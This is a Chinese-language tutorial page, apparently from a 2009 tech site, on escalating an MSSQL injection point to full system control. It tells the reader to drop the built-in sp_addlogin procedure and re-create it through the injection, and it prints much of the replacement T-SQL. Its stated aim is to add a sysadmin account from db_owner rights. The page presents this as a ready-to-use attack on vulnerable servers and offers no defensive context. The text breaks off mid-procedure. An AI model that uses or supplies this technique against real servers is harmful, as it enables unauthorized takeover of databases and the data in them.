当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL注入攻击通杀

MSSQL
SQL Server 中死锁产生的原因及解决办法
教你在SQL Server 2000数据库中使用分区
数据仓库基本报表制作过程中的SQL写法
自动定时重启sql server回收内存
轻松解决SQL Server 2005中的常见问题
用一个案例讲解SQL Server数据库恢复
安装SQL Server 2005时出现计数器错误
讲解SQL Server 2005数据库的同义词Bug
利用SQL语句对不同数据库进行高效果分页
三种数据库利用SQL语句进行高效果分页
数据库连接字符串的常见问题和解决方法
教你快速掌握一些方便易用的SQL语句
深入分析SQL Server的数据转换服务
系统默认的MySQL用户名消失的解决方法
SQL 2008邮件故障排除:发送测试电子邮件
SQL Server 2005日志文件损坏的处理方法
在SQL Server 2005数据库中进行错误捕捉
SQL Server查询速度慢原因及优化方法
加密SQL Anywhere 提升政府行业数据安全
Windows Server 2008之数据安全保护

MSSQL 中的 SQL注入攻击通杀


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-30   浏览: 137 ::
收藏到网摘: n/a

 MSSQL注入通杀,只要有注入点就有系统权限 
  不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
  @loginame sysname
  ,@passwd sysname = Null
  ,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT
  CONFIGURABLE???
  ,@deflanguage sysname = Null
  ,@sid varbinary(16) = Null
  ,@encryptopt varchar(20) = Null
  AS
  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
  set nocount on
  Declare @ret int -- return value of sp call
  -- DISALLOW USER TRANSACTION --
  set implicit_transactions off
  IF (@@trancount > 0)
  begin
  raiserror(15002,-1,-1,’sp_addlogin’)
  return (1)
  end
  -- VALIDATE LOGIN NAME AS:
  -- (1) Valid SQL Name (SQL LOGIN)
  -- (2) No backslash (NT users only)
  -- (3) Not a reserved login name
  execute @ret = sp_validname @loginame
  if (@ret <> 0)
  return (1)
  if (charindex(’\’, @loginame) > 0)
  begin
  raiserror(15006,-1,-1,@loginame)
  return (1)
  end
  --Note: different case sa is allowed.
  if (@loginame = ’sa’ or lower(@loginame) in (’public’))
  begin
  raiserror(15405, -1 ,-1, @loginame)
  return (1)
  end
  -- LOGIN NAME MUST NOT ALREADY EXIST --
  if exists(select * from master.dbo.syslogins where loginname =
  @loginame)
  begin
  raiserror(15025,-1,-1,@loginame)
  return (1)
  end
  -- VALIDATE DEFAULT DATABASE --
  IF db_id(@defdb) IS NULL
  begin
  raiserror(15010,-1,-1,@defdb)
  return (1)
  end
  -- VALIDATE DEFAULT LANGUAGE --
  IF (@deflanguage IS NOT Null)
  begin
  Execute @ret = sp_validlang @deflanguage
  IF (@ret <> 0)
  return (1)
  end
  ELSE
  begin
  select @deflanguage = name from master.dbo.syslanguages
  where langid = @@default_langid --server default
  language
  if @deflanguage is null
  select @deflanguage = N’us_english’
  end
  -- VALIDATE SID IF GIVEN --
  if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
  begin
  raiserror(15419,-1,-1)
  return (1)
  end
  else if @sid is null
  select @sid = newid()
  if (suser_sname(@sid) IS NOT Null)
  begin
  raiserror(15433,-1,-1)
  return (1)
  end
  -- VALIDATE AND USE ENCRYPTION OPTION --
  declare @xstatus smallint
  select @xstatus = 2 -- access
  if @encryptopt is null
  select @passwd = pwdencrypt(@passwd)
  else if @encryptopt = ’skip_encryption_old’
  begin
  select @xstatus = @xstatus&nb